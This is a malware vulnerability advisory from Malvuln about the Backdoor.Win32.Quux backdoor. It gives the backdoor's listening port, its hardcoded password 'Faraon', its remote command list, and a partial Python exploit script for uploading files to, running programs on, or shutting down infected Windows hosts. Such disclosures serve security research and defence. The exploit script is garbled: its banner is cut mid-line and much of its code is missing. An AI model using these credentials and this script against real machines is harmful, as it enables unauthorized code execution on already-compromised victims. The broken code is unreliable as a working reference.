Discovery / credits: Malvuln (John Page aka hyp3rlinx) (c) 2022 Original source: https://malvuln.com/advisory/13ce53de9ca4c4e6c58f990b442cb419.txt Contact: [email protected] Media: twitter.com/malvuln Threat: Backdoor.Win32.Quux Vulnerability: Weak Hardcoded Credentials Family: Quux Type: PE32 MD5: 13ce53de9ca4c4e6c58f990b442cb419 Vuln ID: MVID-2022-0656 Dropped files: quux32.exe Disclosure: 11/15/2022 Description: The malware listens on TCP port 3. Authentication is required, however the password "Faraon" translated from Romanian as "Pharaoh" is weak and hardcoded in cleartext within the PE file. Third-party adversaries who can reach an infected host can call commands made available by the backdoor. Commands include uploading files and code execution. Theres a need to code a custom client to communicate with the infected host as nc64.exe and telnet send LF characters and will fail authentication when sending credentials containing "
" etc. Once connected if we send any files they will be written to WindowsSystem unless calling the "SetCurrDir" commmand. 0040AD24 ; char aFaraon[] 0040AD24 aFaraon db 'Faraon',0 ; DATA XREF _WinMain@16_0+376↑o 0040AD2B align 100h [Commands] SetCurrDir GetCurrDir GetCurrentDirectory Exec GetFile SendFile quit exit shutdown dir CreateFile DeleteFile MessageBox die Exploit/PoC: "quux32_xploit.py" from socket import * import time, sys BANNER=""" ____ ____ ___ ____ __ _ __ / __ \__ ____ ____ __ |_ /|_ | / __/_ __ ___ / /__ (_) /_ / /_/ / // / // / /_/_ ") if _file: upload(_file) else: exit(1) elif CMD=="2": pgm=input("[-] Program to run: > ") if pgm: execute(pgm) else: exit(1) elif CMD=="3": choice=input("[-] Kill server? 1=Yes > ") if choice.lower()=="1": kill_srv() else: print("[!] Invalid IP!") exit(1) else: print("[*] QuuX32 Exploit Usage:
[-]IP: x.x.x.x, Command (1=Upload file, 2=Exec program, 3=Kill server)") exit(1) Disclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not a ..
Support the originator by clicking the read the rest link below.
